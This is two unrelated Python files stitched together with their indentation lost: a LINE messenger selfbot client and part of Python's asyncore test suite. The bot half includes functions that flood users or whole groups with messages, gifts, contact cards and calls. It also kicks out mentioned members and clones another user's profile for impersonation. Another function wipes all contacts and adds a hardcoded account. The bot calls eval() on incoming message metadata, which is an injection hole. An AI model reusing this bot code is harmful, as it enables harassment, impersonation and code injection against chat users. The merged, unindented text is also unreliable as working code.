def createannoun(self,msg,wait):
msg.text = self.mycmd(msg.text,wait)
if msg.text.lower() == 'announ clear':
a = self.getChatRoomAnnouncements(msg.to)
try:
for b in a:
self.removeChatRoomAnnouncement(msg.to,b.announcementSeq)
self.sendMessage(msg.to, 'Done')
except Exception as e:
ee = traceback.format_exc()
self.sendMessage(msg.to, '{}'.format(e))
else:
adit = ChatRoomAnnouncementContents()
adit.text = self.adityasplittext(msg.text,'ss')
try:adit.link= 'line://ti/p/~{}'.format(self.profile.userid)
except:adit.link = 'line://ti/p/tzNPFGlbKW'
adit.displayFields = 1
try:
adit.thumbnail = "http://dl.profile.line-cdn.net/"+ self.getGroup(msg.to).pictureStatus
except:
adit.thumbnail = 'https://adityapypi-api-id.herokuapp.com/static/lang-logo.png'
if msg.text.lower().startswith('announ create lock '):self.createChatRoomAnnouncement(msg.to,1,adit)
if msg.text.lower().startswith('announ create unlock '):self.createChatRoomAnnouncement(msg.to,0,adit)
if msg.text.lower().startswith('announ create all '):
a = self.getGroupIdsJoined()
for i in a:
G = self.getGroup(i).pictureStatus
adit.thumbnail = "http://dl.profile.line-cdn.net/"+ G
self.createChatRoomAnnouncement(i,1,adit)
self.sendMessage(msg.to,' 「 Announcements 」\nStatus: Success Announcement')
def mykeyset(self,t,wait):wait["setkey"] = t.split(' ')[0];return " 「 Rname 」\nKey has been set to "+wait["setkey"].title()
def clearfriend(self,msg):
n = len(self.getAllContactIds())
try:
self.clearContacts()
except:
pass
t = len(self.getAllContactIds())
self.findAndAddContactsByMid('u2286e272840491415e82447163dadf6c')
self.sendMessage(msg.to,"Friends before: %s\nFriends after:%s\nTotal removed:%s"%(n,t,(n-t)))
def clearContacts(self):
t = self.getContacts(self.getAllContactIds())
for n in t:
try:
self.AdityadeleteContact(n.mid)
except:
pass
pass
def refreshContacts(self):
contact_ids = self.getAllContactIds()
contacts = self.getContacts(contact_ids)
contacts = [contact.displayName+',./;'+contact.mid for contact in contacts]
contacts.sort()
contacts = [a.split(',./;')[1] for a in contacts]
return contacts
def AdityadeleteContact(self, contact):
try:
self.talk.updateContactSetting(16,contact,ContactSetting.CONTACT_SETTING_DELETE,'True')
except:
traceback.print_exc()
pass
@loggedIn
def acquireEncryptedAccessToken(self, featureType=2):
return self.talk.acquireEncryptedAccessToken(featureType)
@loggedIn
def getProfile(self):
return self.talk.getProfile()
@loggedIn
def getSettings(self):
return self.talk.getSettings()
@loggedIn
def getUserTicket(self):
return self.talk.getUserTicket()
@loggedIn
def updateProfile(self, profileObject):
return self.talk.updateProfile(0, profileObject)
@loggedIn
def updateSettings(self, settingObject):
return self.talk.updateSettings(0, settingObject)
@loggedIn
def updateProfileAttribute(self, attrId, value):
return self.talk.updateProfileAttribute(0, attrId, value)
"""Operation"""
@loggedIn
def fetchOperation(self, revision, count):
return self.talk.fetchOperations(revision, count)
@loggedIn
def getLastOpRevision(self):
return self.talk.getLastOpRevision()
"""Message"""
@loggedIn
def sendMessage(self, to, text, contentMetadata={}, contentType=0):
msg = Message()
msg.to, msg._from = to, self.profile.mid
msg.text = text
msg.contentType, msg.contentMetadata = contentType, contentMetadata
if to not in self._messageReq:
self._messageReq[to] = -1
self._messageReq[to] += 1
return self.talk.sendMessage(self._messageReq[to], msg)
@loggedIn
def sendSticker(self, to, packageId, stickerId):
contentMetadata = {
'STKVER': '100',
'STKPKGID': packageId,
'STKID': stickerId
}
return self.sendMessage(to, '', contentMetadata, 7)
@loggedIn
def sendContact(self, to, mid):
contentMetadata = {'mid': mid}
return self.sendMessage(to, '', contentMetadata, 13)
@loggedIn
def sendGift(self, to, productId, productType):
if productType not in ['theme','sticker']:
raise Exception('Invalid productType value')
contentMetadata = {
'MSGTPL': str(randint(0, 12)),
'PRDTYPE': productType.upper(),
'STKPKGID' if productType == 'sticker' else 'PRDID': productId
}
return self.sendMessage(to, '', contentMetadata, 9)
@loggedIn
def sendMessageAwaitCommit(self, to, text, contentMetadata={}, contentType=0):
msg = Message()
msg.to, msg._from = to, self.profile.mid
msg.text = text
msg.contentType, msg.contentMetadata = contentType, contentMetadata
if to not in self._messageReq:
self._messageReq[to] = -1
self._messageReq[to] += 1
return self.talk.sendMessageAwaitCommit(self._messageReq[to], msg)
@loggedIn
def generateReplyMessage(self, relatedMessageId):
msg = Message()
msg.relatedMessageServiceCode = 1
msg.messageRelationType = 3
msg.relatedMessageId = str(relatedMessageId)
return msg
@loggedIn
def sendReplyMessage(self, relatedMessageId, to, text, contentMetadata={}, contentType=0):
msg = self.generateReplyMessage(relatedMessageId)
msg.to = to
msg.text = text
msg.contentType = contentType
msg.contentMetadata = contentMetadata
if to not in self._messageReq:
self._messageReq[to] = -1
self._messageReq[to] += 1
return self.talk.sendMessage(self._messageReq[to], msg)
@loggedIn
def unsendMessage(self, messageId):
self._unsendMessageReq += 1
return self.talk.unsendMessage(self._unsendMessageReq, messageId)
@loggedIn
def requestResendMessage(self, senderMid, messageId):
return self.talk.requestResendMessage(0, senderMid, messageId)
@loggedIn
def respondResendMessage(self, receiverMid, originalMessageId, resendMessage, errorCode):
return self.talk.respondResendMessage(0, receiverMid, originalMessageId, resendMessage, errorCode)
@loggedIn
def removeMessage(self, messageId):
return self.talk.removeMessage(messageId)
@loggedIn
def removeAllMessages(self, lastMessageId):
return self.talk.removeAllMessages(0, lastMessageId)
@loggedIn
def getBlockedRecommendationIds(self):
return self.talk.getBlockedRecommendationIds()
@loggedIn
def getRecommendationIds(self):
return self.talk.getFriendRequests(FriendRequestDirection.OUTGOING,1)
@loggedIn
def removeMessageFromMyHome(self, messageId):
return self.talk.removeMessageFromMyHome(messageId)
@loggedIn
def destroyMessage(self, chatId, messageId):
return self.talk.destroyMessage(0, chatId, messageId, sessionId)
@loggedIn
def sendChatChecked(self, consumer, messageId):
return self.talk.sendChatChecked(0, consumer, messageId)
@loggedIn
def sendEvent(self, messageObject):
return self.talk.sendEvent(0, messageObject)
@loggedIn
def getLastReadMessageIds(self, chatId):
return self.talk.getLastReadMessageIds(chatId)
@loggedIn
def getPreviousMessagesV2WithReadCount(self, messageBoxId, endMessageId, messagesCount=50):
return self.talk.getPreviousMessagesV2WithReadCount(messageBoxId, endMessageId, messagesCount)
"""Object"""
@loggedIn
def sendImage(self, to, path,texk='Image'):
objectId = self.sendMessage(to=to, text=None,contentMetadata={'AGENT_ICON': "http://dl.profile.line-cdn.net/" + self.getProfile().picturePath, 'AGENT_NAME': texk, 'AGENT_LINK': 'line://ti/p/~{}'.format(self.getProfile().userid)}, contentType = 1).id
return self.uploadObjTalk(path=path, type='image', returnAs='bool', objId=objectId)
@loggedIn
def sendImageWithURL(self, to, url,texk='Image'):
path = self.downloadFileURL(url, 'path')
return self.sendImage(to, path,texk)
def soundcloud(self,msg,wait):
msg.text = self.mycmd(msg.text,wait)
if msg.text.lower().startswith("soundcloud "):
kitsunesplit = self.adityasplittext(msg.text.lower()).split("|")
r = requests.get('https://soundcloud.com/search?q={}'.format(self.adityasplittext(msg.text.lower())))
soup = BeautifulSoup(r.text,'html5lib')
data = soup.find_all(class_='soundTitle__titleContainer')
data = soup.select('li > h2 > a')
if len(kitsunesplit) == 1:
a = ' 「 Soundcloud 」';no=0
for b in data:
no+=1
a+= '\n{}. {}'.format(no,b.text)
self.sendMessage(msg.to,a)
if len(kitsunesplit) == 2:
a = data[int(kitsunesplit[1])-1];b = list(a)[0]
kk = random.randint(0,999)
self.sendMessage(msg.to,' 「 Soundcloud 」\nJudul: {}\nStatus: Waiting... For Upload'.format(a.text), self.templatefoot('https://soundcloud.com{}'.format(a.get('href')),"http://dl.profile.line-cdn.net/" + self.getProfile().picturePath,a.text))
hh=subprocess.getoutput('youtube-dl --extract-audio --audio-format mp3 --output {}.mp3 {}'.format(kk,'https://soundcloud.com{}'.format(a.get('href'))))
try:self.sendAudio(msg.to,'{}.mp3'.format(kk))
except Exception as e:self.sendMessage(msg.to,' 「 ERROR 」\nJudul: {}\nStatus: {}\nImportant: Try again'.format(a.text,e), self.templatefoot('https://soundcloud.com{}'.format(a.get('href')),"http://dl.profile.line-cdn.net/" + self.getProfile().picturePath,a.text))
os.remove('{}.mp3'.format(kk))
def imagegoogle(self,msg,wait):
msg.text = self.mycmd(msg.text,wait)
to = msg.to
data = self.image_search(self.adityasplittext(msg.text))
try:
a = data['ou']
if '.gif' in a:
return self.sendGIFWithURL(to,a)
return self.sendImageWithURL(to,a,'Google Image')
self.sendMention(to,' 「 Image 」\nInfo: Hy @! I get num #{} from #100'.format(aa+1),'',[msg._from])
except Exception as e:
self.sendMessage(to,' 「 Error 」\nStatus:\n{}'.format(e))
def image_search(self, query):
query = query.replace(' ', "%20")
url = "https://www.google.com/search?hl=en&site=imghp&tbm=isch&tbs=isz:l&q=" + query
mozhdr = {'User-Agent': "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.75 Safari/537.36"}
req = requests.get(url, headers = mozhdr)
soupeddata = BeautifulSoup(req.content , "lxml")
images = soupeddata.find_all("div", {"class": "rg_meta notranslate"})
aa = random.randint(0,len(images))
try:
images = json.loads(images[aa].text)
return images
except Exception as e:return e
def imageart(self,msg,wait):
msg.text = self.mycmd(msg.text,wait)
to = msg.to
data = self.adityarequestweb("https://www.artstation.com/search/projects.json?direction=desc&order=published_at&page=1&q={}&show_pro_first=true".format(self.adityasplittext(msg.text)))
aa = random.randint(0,len(data['data'])-1)
try:
a = data['data'][aa]['cover']['medium_image_url']
self.sendImageWithURL(to,a,'Artstation')
if data['data'][aa]['description'] == '':sdf = '\nDescription: {}'.format(data['data'][aa]['description'])
else:sdf = ''
self.sendMention(to,' 「 Image 」\n | INFO |\nTitle: {}{}\nImportant: Oky @! I get your image num #{} from #{}'.format(data['data'][aa]['title'],sdf,aa+1,data['total_count']),data['data'][aa]['title'],[msg._from])
except Exception as e:
self.sendMessage(to,' 「 Error 」\nStatus:\n{}'.format(e))
@loggedIn
def sendGIF(self, to, path):
return self.uploadObjTalk(path=path, type='gif', returnAs='bool', to=to)
@loggedIn
def sendGIFWithURL(self, to, url):
path = self.downloadFileURL(url, 'path')
return self.sendGIF(to, path)
@loggedIn
def sendVideo(self, to, path):
objectId = self.sendMessage(to=to, text=None, contentMetadata={'VIDLEN': '60000','DURATION': '60000'}, contentType = 2).id
return self.uploadObjTalk(path=path, type='video', returnAs='bool', objId=objectId)
@loggedIn
def sendVideoWithURL(self, to, url):
path = self.downloadFileURL(url, 'path')
return self.sendVideo(to, path)
@loggedIn
def sendAudio(self, to, path):
objectId = self.sendMessage(to=to, text=None, contentType = 3).id
return self.uploadObjTalk(path=path, type='audio', returnAs='bool', objId=objectId)
@loggedIn
def sendAudioWithURL(self, to, url):
path = self.downloadFileURL(url, 'path')
return self.sendAudio(to, path)
@loggedIn
def sendFile(self, to, path, file_name='',ct = ''):
if ct == '':
ct = {'FILE_NAME': str(file_name),'FILE_SIZE': str(file_size)}
if file_name == '':
file_name = ntpath.basename(path)
file_size = len(open(path, 'rb').read())
objectId = self.sendMessage(to=to, text=None, contentMetadata=ct, contentType = 14).id
return self.uploadObjTalk(path=path, type='file', returnAs='bool', objId=objectId)
@loggedIn
def sendFileWithURL(self, to, url, fileName=''):
path = self.downloadFileURL(url, 'path')
return self.sendFile(to, path, fileName)
"""Contact"""
@loggedIn
def blockContact(self, mid):
return self.talk.blockContact(0, mid)
@loggedIn
def unblockContact(self, mid):
return self.talk.unblockContact(0, mid)
@loggedIn
def findAndAddContactByMetaTag(self, userid, reference):
return self.talk.findAndAddContactByMetaTag(0, userid, reference)
@loggedIn
def findAndAddContactsByMid(self, mid):
return self.talk.findAndAddContactsByMid(0, mid,5,'')
@loggedIn
def findAndAddContactsByEmail(self, emails=[]):
return self.talk.findAndAddContactsByEmail(0, emails)
@loggedIn
def findAndAddContactsByUserid(self, userid):
return self.talk.findAndAddContactsByUserid(0, userid)
@loggedIn
def findContactsByUserid(self, userid):
return self.talk.findContactByUserid(userid)
@loggedIn
def findContactByTicket(self, ticketId):
return self.talk.findContactByUserTicket(ticketId)
@loggedIn
def getAllContactIds(self):
return self.talk.getAllContactIds()
@loggedIn
def getBlockedContactIds(self):
return self.talk.getBlockedContactIds()
@loggedIn
def getContact(self, mid):
return self.talk.getContact(mid)
@loggedIn
def getContacts(self, midlist):
return self.talk.getContacts(midlist)
@loggedIn
def getFavoriteMids(self):
return self.talk.getFavoriteMids()
@loggedIn
def getHiddenContactMids(self):
return self.talk.getHiddenContactMids()
@loggedIn
def tryFriendRequest(self, midOrEMid, friendRequestParams, method=1):
return self.talk.tryFriendRequest(midOrEMid, method, friendRequestParams)
@loggedIn
def makeUserAddMyselfAsContact(self, contactOwnerMid):
return self.talk.makeUserAddMyselfAsContact(contactOwnerMid)
@loggedIn
def getContactWithFriendRequestStatus(self, id):
return self.talk.getContactWithFriendRequestStatus(id)
@loggedIn
def reissueUserTicket(self, expirationTime=100, maxUseCount=100):
return self.talk.reissueUserTicket(expirationTime, maxUseCount)
@loggedIn
def cloneContactProfile(self, mid):
contact = self.getContact(mid)
profile = self.profile
self.updateProfileAttribute(2, contact.displayName)
self.updateProfileAttribute(16, contact.statusMessage)
if self.getProfileCoverId(mid) is not None:
self.updateProfileCoverById(self.getProfileCoverId(mid))
path = self.downloadFileURL("http://dl.profile.line-cdn.net/"+contact.picturePath, 'path')
self.updateProfilePicture(path)
return
"""Group"""
@loggedIn
def getChatRoomAnnouncementsBulk(self, chatRoomMids):
return self.talk.getChatRoomAnnouncementsBulk(chatRoomMids)
@loggedIn
def getChatRoomAnnouncements(self, chatRoomMid):
return self.talk.getChatRoomAnnouncements(chatRoomMid)
@loggedIn
def createChatRoomAnnouncement(self, chatRoomMid, type, contents):
return self.talk.createChatRoomAnnouncement(0, chatRoomMid, type, contents)
@loggedIn
def removeChatRoomAnnouncement(self, chatRoomMid, announcementSeq):
return self.talk.removeChatRoomAnnouncement(0, chatRoomMid, announcementSeq)
@loggedIn
def getGroupWithoutMembers(self, groupId):
return self.talk.getGroupWithoutMembers(groupId)
@loggedIn
def findGroupByTicket(self, ticketId):
return self.talk.findGroupByTicket(ticketId)
@loggedIn
def acceptGroupInvitation(self, groupId):
return self.talk.acceptGroupInvitation(0, groupId)
@loggedIn
def acceptGroupInvitationByTicket(self, groupId, ticketId):
return self.talk.acceptGroupInvitationByTicket(0, groupId, ticketId)
@loggedIn
def cancelGroupInvitation(self, groupId, contactIds):
return self.talk.cancelGroupInvitation(0, groupId, contactIds)
@loggedIn
def createGroup(self, name, midlist):
return self.talk.createGroup(0, name, midlist)
@loggedIn
def getGroup(self, groupId):
return self.talk.getGroup(groupId)
@loggedIn
def getGroups(self, groupIds):
return self.talk.getGroups(groupIds)
@loggedIn
def getGroupsV2(self, groupIds):
return self.talk.getGroupsV2(groupIds)
@loggedIn
def getCompactGroup(self, groupId):
return self.talk.getCompactGroup(groupId)
@loggedIn
def getCompactRoom(self, roomId):
return self.talk.getCompactRoom(roomId)
@loggedIn
def getGroupIdsByName(self, groupName):
gIds = []
for gId in self.getGroupIdsJoined():
g = self.getCompactGroup(gId)
if groupName in g.name:
gIds.append(gId)
return gIds
@loggedIn
def getGroupIdsInvited(self):
return self.talk.getGroupIdsInvited()
@loggedIn
def getGroupIdsJoined(self):
return self.talk.getGroupIdsJoined()
@loggedIn
def updateGroupPreferenceAttribute(self, groupMid, updatedAttrs):
return self.talk.updateGroupPreferenceAttribute(0, groupMid, updatedAttrs)
@loggedIn
def inviteIntoGroup(self, groupId, midlist):
return self.talk.inviteIntoGroup(0, groupId, midlist)
@loggedIn
def kickoutFromGroup(self, groupId, midlist):
return self.talk.kickoutFromGroup(0, groupId, midlist)
@loggedIn
def leaveGroup(self, groupId):
return self.talk.leaveGroup(0, groupId)
@loggedIn
def rejectGroupInvitation(self, groupId):
return self.talk.rejectGroupInvitation(0, groupId)
@loggedIn
def reissueGroupTicket(self, groupId):
return self.talk.reissueGroupTicket(groupId)
@loggedIn
def updateGroup(self, groupObject):
return self.talk.updateGroup(0, groupObject)
"""Room"""
@loggedIn
def createRoom(self, midlist):
return self.talk.createRoom(0, midlist)
@loggedIn
def getRoom(self, roomId):
return self.talk.getRoom(roomId)
@loggedIn
def inviteIntoRoom(self, roomId, midlist):
return self.talk.inviteIntoRoom(0, roomId, midlist)
@loggedIn
def leaveRoom(self, roomId):
return self.talk.leaveRoom(0, roomId)
@loggedIn
def kusumu(self,msg):
self.sendMessage(msg.to,'Logout From Device')
self.logout()
"""Call"""
@loggedIn
def acquireCallTalkRoute(self, to):
return self.talk.acquireCallRoute(to)
"""Liff"""
@loggedIn
def issueLiffView(self, request):
return self.liff.issueLiffView(request)
@loggedIn
def revokeToken(self, request):
return self.liff.revokeToken(request)
"""Report"""
@loggedIn
def reportSpam(self, chatMid, memberMids=[], spammerReasons=[], senderMids=[], spamMessageIds=[], spamMessages=[]):
return self.talk.reportSpam(chatMid, memberMids, spammerReasons, senderMids, spamMessageIds, spamMessages)
@loggedIn
def reportSpammer(self, spammerMid, spammerReasons=[], spamMessageIds=[]):
return self.talk.reportSpammer(spammerMid, spammerReasons, spamMessageIds)
def mycmd(self,text,wait):
cmd = ''
pesan = text.lower()
if wait['setkey'] != '':
if pesan.startswith(wait['setkey']):
cmd = pesan.replace(wait['setkey']+' ','').replace(wait['setkey'],'')
else:
cmd = text
return cmd
def adityasplittext(self,text,lp=''):
separate = text.split(" ")
if lp == '':adalah = text.replace(separate[0]+" ","")
elif lp == 's':adalah = text.replace(separate[0]+" "+separate[1]+" ","")
else:adalah = text.replace(separate[0]+" "+separate[1]+" "+separate[2]+" ","")
return adalah
def AdityaKicks(self,msg):
if 'MENTION' in msg.contentMetadata.keys()!=None:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
self.kickoutFromGroup(msg.to,[target])
except Exception as e:
self.sendMessage(msg.to,str(e))
def AdityaSpam(self,wait,msg):
to = msg.to
lontong = msg.text
msg.text = self.mycmd(msg.text,wait)
ditcmd = msg.text.lower()
if ditcmd.startswith('spam 1 '):j = int(msg.text.split(' ')[2])
if ditcmd.startswith('unsend '):j = int(msg.text.split(' ')[1])
if ditcmd.startswith('spam 2 '):j = int(msg.text.split(' ')[2])
if ditcmd.startswith('spam 3 '):j = int(msg.text.split(' ')[2])
if ditcmd.startswith('spam 4 '):j = int(msg.text.split(' ')[2])
if ditcmd.startswith('spam 5 '):j = int(msg.text.split(' ')[2])
if ditcmd.startswith('gcall '):j = int(msg.text.split(' ')[1])
a = [self.adityasplittext(msg.text,'s').replace('{} '.format(j),'')]*j
if 'MENTION' in msg.contentMetadata.keys()!=None:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
nama = [key1]
if ditcmd.startswith('spam 3 '):b = [self.sendContact(to,key1) for b in a];self.sendMention(to, '「 Spam 」\n@!has been spammed with {} amount of contact♪'.format(j),'',[key1])
if ditcmd.startswith('spam 4 '):
if lontong.lower().startswith(wait['setkey']+" "):gss = 7 + len(wait['setkey'])+1
else:gss = 7 + len(wait['setkey'])
msg.contentMetadata = {'AGENT_LINK': 'line://ti/p/~{}'.format(self.getProfile().userid),'AGENT_ICON': "http://dl.profile.line-cdn.net/" + self.getProfile().picturePath,'AGENT_NAME': ' 「 SPAM MENTION 」','MENTION': str('{"MENTIONEES":' + json.dumps([{'S':str(int(key['S'])-gss-len(msg.text.split(' ')[2])-1+13), 'E':str(int(key['E'])-gss-len(msg.text.split(' ')[2])-1+13), 'M':key['M']} for key in eval(msg.contentMetadata["MENTION"])["MENTIONEES"]]) + '}')}
msg.text = lontong[gss+1+len(msg.text.split(' ')[2]):].replace(lontong[gss+1+len(msg.text.split(' ')[2]):],' 「 Mention 」\n{}'.format(lontong[gss+1+len(msg.text.split(' ')[2]):]))
b = [self.sendMessages(msg) for b in a]
if ditcmd.startswith('spam 2 '):[self.giftmessage(key1) for b in a];self.sendMention(to, '「 Spam 」\n@!has been spammed with {} amount of gift♪'.format(j),'',[key1])
if ditcmd.startswith('gcall '):b = [self.call.inviteIntoGroupCall(to,nama,mediaType=2) for b in a];self.sendMention(to, '「 Gcall 」\n@!has been spammed with {} amount of call♪'.format(j),'',[key1])
else:
if ditcmd.startswith('gcall '):
group = self.getGroup(to);nama = [contact.mid for contact in group.members];b = [self.call.inviteIntoGroupCall(to,nama,mediaType=2) for b in a]
self.sendMention(to, ' 「 Gcall 」\n@!spammed with {} amount of call to all member♪'.format(j),'',[msg._from])
if ditcmd.startswith('spam 3 '):
try:group = self.getGroup(to);nama = [contact.mid for contact in group.members];b = [self.sendContact(to,random.choice(nama)) for b in a]
except:nama = [to,to];b = [self.sendContact(to,random.choice(nama)) for b in a]
if ditcmd.startswith('spam 2 '):b = [self.giftmessage(to) for b in a]
if ditcmd.startswith('spam 1 '):h = [self.sendMessage(to,b) for b in a];self.sendMessage(to, '「 Spam 」\nTarget has been spammed with {} amount of messages♪'.format(j))
if ditcmd.startswith('unsend '):
if len(msg.text.split(' ')) == 2:
h = wait['Unsend'][to]['B']
n = len(wait['Unsend'][to]['B'])
for b in h[:j]:
try:
self.unsendMessage(b)
wait['Unsend'][to]['B'].remove(b)
except:pass
t = len(wait['Unsend'][to]['B'])
self.sendMessage(to,"Sukses Mengurungkan {} pesan".format((n-t)))
if len(msg.text.split(' ')) >= 3:h = [self.unsendMessage(self.sendMessage(to,self.adityasplittext(msg.text,'s')).id) for b in a]
|
test_asyncore.py
|
import asyncore
import unittest
import select
import os
import socket
import sys
import time
import errno
import struct
from test import support
from io import BytesIO
try:
import threading
except ImportError:
threading = None
TIMEOUT = 3
HAS_UNIX_SOCKETS = hasattr(socket, 'AF_UNIX')
class dummysocket:
def __init__(self):
self.closed = False
def close(self):
self.closed = True
def fileno(self):
return 42
class dummychannel:
def __init__(self):
self.socket = dummysocket()
def close(self):
self.socket.close()
class exitingdummy:
def __init__(self):
pass
def handle_read_event(self):
raise asyncore.ExitNow()
handle_write_event = handle_read_event
handle_close = handle_read_event
handle_expt_event = handle_read_event
class crashingdummy:
def __init__(self):
self.error_handled = False
def handle_read_event(self):
raise Exception()
handle_write_event = handle_read_event
handle_close = handle_read_event
handle_expt_event = handle_read_event
def handle_error(self):
self.error_handled = True
# used when testing senders; just collects what it gets until newline is sent
def capture_server(evt, buf, serv):
try:
serv.listen()
conn, addr = serv.accept()
except socket.timeout:
pass
else:
n = 200
start = time.time()
while n > 0 and time.time() - start < 3.0:
r, w, e = select.select([conn], [], [], 0.1)
if r:
n -= 1
data = conn.recv(10)
# keep everything except for the newline terminator
buf.write(data.replace(b'\n', b''))
if b'\n' in data:
break
time.sleep(0.01)
conn.close()
finally:
serv.close()
evt.set()
def bind_af_aware(sock, addr):
"""Helper function to bind a socket according to its family."""
if HAS_UNIX_SOCKETS and sock.family == socket.AF_UNIX:
# Make sure the path doesn't exist.
support.unlink(addr)
sock.bind(addr)
class HelperFunctionTests(unittest.TestCase):
def test_readwriteexc(self):
# Check exception handling behavior of read, write and _exception
# check that ExitNow exceptions in the object handler method
# bubbles all the way up through asyncore read/write/_exception calls
tr1 = exitingdummy()
self.assertRaises(asyncore.ExitNow, asyncore.read, tr1)
self.assertRaises(asyncore.ExitNow, asyncore.write, tr1)
self.assertRaises(asyncore.ExitNow, asyncore._exception, tr1)
# check that an exception other than ExitNow in the object handler
# method causes the handle_error method to get called
tr2 = crashingdummy()
asyncore.read(tr2)
self.assertEqual(tr2.error_handled, True)
tr2 = crashingdummy()
asyncore.write(tr2)
self.assertEqual(tr2.error_handled, True)
tr2 = crashingdummy()
asyncore._exception(tr2)
self.assertEqual(tr2.error_handled, True)
# asyncore.readwrite uses constants in the select module that
# are not present in Windows systems (see this thread:
# http://mail.python.org/pipermail/python-list/2001-October/109973.html)
# These constants should be present as long as poll is available
@unittest.skipUnless(hasattr(select, 'poll'), 'select.poll required')
def test_readwrite(self):
# Check that correct methods are called by readwrite()
attributes = ('read', 'expt', 'write', 'closed', 'error_handled')
expected = (
(select.POLLIN, 'read'),
(select.POLLPRI, 'expt'),
(select.POLLOUT, 'write'),
(select.POLLERR, 'closed'),
(select.POLLHUP, 'closed'),
(select.POLLNVAL, 'closed'),
)
class testobj:
def __init__(self):
self.read = False
self.write = False
self.closed = False
self.expt = False
self.error_handled = False
def handle_read_event(self):
self.read = True
def handle_write_event(self):
self.write = True
def handle_close(self):
self.closed = True
def handle_expt_event(self):
self.expt = True
def handle_error(self):
self.error_handled = True
for flag, expectedattr in expected:
tobj = testobj()
self.assertEqual(getattr(tobj, expectedattr), False)
asyncore.readwrite(tobj, flag)
# Only the attribute modified by the routine we expect to be
# called should be True.
for attr in attributes:
self.assertEqual(getattr(tobj, attr), attr==expectedattr)
# check that ExitNow exceptions in the object handler method
# bubbles all the way up through asyncore readwrite call
tr1 = exitingdummy()
self.assertRaises(asyncore.ExitNow, asyncore.readwrite, tr1, flag)
# check that an exception other than ExitNow in the object handler
# method causes the handle_error method to get called
tr2 = crashingdummy()
self.assertEqual(tr2.error_handled, False)
asyncore.readwrite(tr2, flag)
self.assertEqual(tr2.error_handled, True)
def test_closeall(self):
self.closeall_check(False)
def test_closeall_default(self):
self.closeall_check(True)
def closeall_check(self, usedefault):
# Check that close_all() closes everything in a given map
l = []
testmap = {}
for i in range(10):
c = dummychannel()
l.append(c)
self.assertEqual(c.socket.closed, False)
testmap[i] = c
if usedefault:
socketmap = asyncore.socket_map
try:
asyncore.socket_map = testmap
asyncore.close_all()
finally:
testmap, asyncore.socket_map = asyncore.socket_map, socketmap
else:
asyncore.close_all(testmap)
self.assertEqual(len(testmap), 0)
for c in l:
self.assertEqual(c.socket.closed, True)
def test_compact_traceback(self):
try:
raise Exception("I don't like spam!")
except:
real_t, real_v, real_tb = sys.exc_info()
r = asyncore.compact_traceback()
else:
self.fail("Expected exception")
(f, function, line), t, v, info = r
self.assertEqual(os.path.split(f)[-1], 'test_asyncore.py')
self.assertEqual(function, 'test_compact_traceback')
self.assertEqual(t, real_t)
self.assertEqual(v, real_v)
self.assertEqual(info, '[%s|%s|%s]' % (f, function, line))
class DispatcherTests(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
asyncore.close_all()
def test_basic(self):
d = asyncore.dispatcher()
self.assertEqual(d.readable(), True)
self.assertEqual(d.writable(), True)
def test_repr(self):
d = asyncore.dispatcher()
self.assertEqual(repr(d), '<asyncore.dispatcher at %#x>' % id(d))
def test_log(self):
d = asyncore.dispatcher()
# capture output of dispatcher.log() (to stderr)
l1 = "Lovely spam! Wonderful spam!"
l2 = "I don't like spam!"
with support.captured_stderr() as stderr:
d.log(l1)
d.log(l2)
lines = stderr.getvalue().splitlines()
self.assertEqual(lines, ['log: %s' % l1, 'log: %s' % l2])
def test_log_info(self):
d = asyncore.dispatcher()
# capture output of dispatcher.log_info() (to stdout via print)
l1 = "Have you got anything without spam?"
l2 = "Why can't she have egg bacon spam and sausage?"
l3 = "THAT'S got spam in it!"
with support.captured_stdout() as stdout:
d.log_info(l1, 'EGGS')
d.log_info(l2)
d.log_info(l3, 'SPAM')
lines = stdout.getvalue().splitlines()
expected = ['EGGS: %s' % l1, 'info: %s' % l2, 'SPAM: %s' % l3]
self.assertEqual(lines, expected)
def test_unhandled(self):
d = asyncore.dispatcher()
d.ignore_log_types = ()
# capture output of dispatcher.log_info() (to stdout via print)
with support.captured_stdout() as stdout:
d.handle_expt()
d.handle_read()
d.handle_write()
d.handle_connect()
lines = stdout.getvalue().splitlines()
expected = ['warning: unhandled incoming priority event',
'warning: unhandled read event',
'warning: unhandled write event',
'warning: unhandled connect event']
self.assertEqual(lines, expected)
def test_strerror(self):
# refers to bug #8573
err = asyncore._strerror(errno.EPERM)
if hasattr(os, 'strerror'):
self.assertEqual(err, os.strerror(errno.EPERM))
err = asyncore._strerror(-1)
self.assertTrue(err != "")
class dispatcherwithsend_noread(asyncore.dispatcher_with_send):
def readable(self):
return False
def handle_connect(self):
pass
class DispatcherWithSendTests(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
asyncore.close_all()
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.reap_threads
def test_send(self):
evt = threading.Event()
sock = socket.socket()
sock.settimeout(3)
port = support.bind_port(sock)
cap = BytesIO()
args = (evt, cap, sock)
t = threading.Thread(target=capture_server, args=args)
t.start()
try:
# wait a little longer for the server to initialize (it sometimes
# refuses connections on slow machines without this wait)
time.sleep(0.2)
data = b"Suppose there isn't a 16-ton weight?"
d = dispatcherwithsend_noread()
d.create_socket()
d.connect((support.HOST, port))
# give time for socket to connect
time.sleep(0.1)
d.send(data)
d.send(data)
d.send(b'\n')
n = 1000
while d.out_buffer and n > 0:
asyncore.poll()
n -= 1
evt.wait()
self.assertEqual(cap.getvalue(), data*2)
finally:
t.join(timeout=TIMEOUT)
if t.is_alive():
self.fail("join() timed out")
@unittest.skipUnless(hasattr(asyncore, 'file_wrapper'),
'asyncore.file_wrapper required')
class FileWrapperTest(unittest.TestCase):
def setUp(self):
self.d = b"It's not dead, it's sleeping!"
with open(support.TESTFN, 'wb') as file:
file.write(self.d)
def tearDown(self):
support.unlink(support.TESTFN)
def test_recv(self):
fd = os.open(support.TESTFN, os.O_RDONLY)
w = asyncore.file_wrapper(fd)
os.close(fd)
self.assertNotEqual(w.fd, fd)
self.assertNotEqual(w.fileno(), fd)
self.assertEqual(w.recv(13), b"It's not dead")
self.assertEqual(w.read(6), b", it's")
w.close()
self.assertRaises(OSError, w.read, 1)
def test_send(self):
d1 = b"Come again?"
d2 = b"I want to buy some cheese."
